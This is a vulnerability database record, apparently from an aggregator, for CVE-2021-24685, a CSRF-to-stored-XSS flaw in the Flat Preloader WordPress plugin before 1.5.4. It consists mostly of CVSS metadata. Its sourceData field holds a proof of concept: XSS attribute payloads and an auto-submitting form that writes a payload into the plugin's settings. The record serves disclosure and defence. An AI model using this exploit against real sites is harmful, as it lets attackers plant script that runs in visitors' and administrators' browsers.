The plugin does not enforce nonce checks when saving its settings, and does not sanitise or escape them, which could allow attackers to make a logged-in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload). The CSRF was fixed in 1.5.1; further sanitisation was done in v1.5.2 to 1.5.4.
{"id": "WPEX-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting", "description": "The plugin does not enforce nonce checks when saving its settings, as well as does not sanitise and escape them, which could allow attackers to a make logged in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload) The CSRF was fixed in 1.5.1, however further sanitisation was done in v1.5.2 to 1.5.4\n", "published": "2021-09-28T00:00:00", "modified": "2021-09-28T06:58:40", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, "href": "", "reporter": "apple502j", "references": [], "cvelist": ["CVE-2021-24685"], "immutableFields": [], "lastseen": "2021-11-26T19:20:23", "viewCount": 47, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24685"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F"]}], "rev": 4}, 
"score": {"value": 4.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24685"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F"]}]}, "exploitation": null, "vulnersScore": 4.3}, "sourceData": "Depending on the payload, the XSS will be triggered either in the frontend or backend:\r\n\r\nFrontend: \" onload=alert(/XSS/)//\r\nBackend: \" style=animation-name:rotation onanimationstart=alert(/XSS/)//\r\n\r\n<form action=\"https://example.com/wp-admin/options-general.php?page=flat-preloader\" method=\"post\" id=\"csrf\">\r\n<input type=\"hidden\" name=\"preloader-style\" value=\"windows-10/circles-menu-1.gif\">\r\n<input type=\"hidden\" name=\"preloader-display\" value=\"all\">\r\n<input type=\"hidden\" name=\"preloader[custom_image_url]\" value=\"\">\r\n<input type=\"hidden\" name=\"preloader[text_under_icon]\" value=\"\">\r\n<input type=\"hidden\" name=\"preloader[delay_time]\" value=\"\">\r\n<input type=\"hidden\" name=\"preloader[alt]\" value='PAYLOAD'>\r\n<input type=\"hidden\" name=\"save-option\" value=\"Save Changes\">\r\n</form>\r\n<script>csrf.submit()</script>", "generation": 0, "_state": {"dependencies": 1646048278}}
{"cve": [{"lastseen": "2022-03-23T15:01:25", "description": "The Flat Preloader WordPress plugin before 1.5.4 does not enforce nonce checks when saving its settings, as well as does not sanitise and escape them, which could allow attackers to a make logged in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.5}, "published": "2021-11-01T09:15:00", "type": "cve", "title": "CVE-2021-24685", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24685"], "modified": "2021-11-02T17:03:00", "cpe": [], "id": "CVE-2021-24685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24685", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-11-26T19:20:23", "description": "The plugin does not enforce nonce checks when saving its settings, as well as does not sanitise and escape them, which could allow attackers to a make logged in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or 
backend depending on the payload) The CSRF was fixed in 1.5.1, however further sanitisation was done in v1.5.2 to 1.5.4\n\n### PoC\n\nDepending on the payload, the XSS will be triggered either in the frontend or backend: Frontend: \" onload=alert(/XSS/)// Backend: \" style=animation-name:rotation onanimationstart=alert(/XSS/)// \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.5}, "published": "2021-09-28T00:00:00", "type": "wpvulndb", "title": "Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24685"], "modified": "2021-09-28T06:58:40", "id": "WPVDB-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F", "href": "https://wpscan.com/vulnerability/972ecde8-3d44-4dd9-81e3-643d8737434f", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}